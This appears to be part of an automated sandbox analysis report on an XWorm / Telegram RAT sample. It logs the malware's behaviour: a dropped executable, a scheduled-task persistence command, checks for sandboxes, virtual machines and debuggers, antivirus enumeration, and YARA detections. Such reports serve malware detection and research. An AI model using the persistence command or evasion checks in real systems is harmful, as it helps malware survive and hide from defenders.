            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeMemory allocated: 860000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeMemory allocated: 1A480000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 1AF50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 1B0C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 1ACC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 7A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 1A2C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 1380000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: 1B1D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599872Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599090Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 598760Jump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWindow / User API: threadDelayed 5882Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWindow / User API: threadDelayed 3890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -33204139332677172s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -599872s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -599218s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -599090s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520Thread sleep time: -598760s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exe TID: 7204Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exe TID: 7376Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exe TID: 7556Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exe TID: 7932Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599872Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 599090Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeThread delayed: delay time: 598760Jump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: task.exe, 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B450000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqq|;
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4E07E8 CheckRemoteDebuggerPresent,7_2_00007FFAAC4E07E8
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exeFile created: WindowsApp.exe.2.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsApp.exe "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"Jump to behavior
            Source: WindowsApp.exe, 00000007.00000002.2427816962.000000000254A000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002894000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>1864657
            Source: WindowsApp.exe, 00000007.00000002.2427816962.000000000254A000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002517000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002512000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>2052191
            Source: WindowsApp.exe, 00000007.00000002.2427816962.000000000254A000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002894000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>1864657@
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002517000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>2055746@
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002512000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>2052191@
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002512000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2052191
            Source: WindowsApp.exe, 00000007.00000002.2427816962.000000000254A000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002894000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,PING!<Xwormmm>Program Manager<Xwormmm>184695@
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,PING!<Xwormmm>Program Manager<Xwormmm>184695
            Source: WindowsApp.exe, 00000007.00000002.2427816962.000000000254A000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002517000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002517000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>2055746
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>184695
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>1864657
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002517000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2055746
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WindowsApp.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeQueries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeQueries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeQueries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeQueries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeQueries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B450000.00000004.00000020.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2431833922.000000001B516000.00000004.00000020.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2432794842.000000001C17D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WindowsApp.exe PID: 1204, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7172, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7480, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7912, type: MEMORYSTR
            Yara detected XWorm
            Source: Yara matchFile source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WindowsApp.exe PID: 1204, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7172, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: task.exe PID: 7352, type: MEMORYSTR
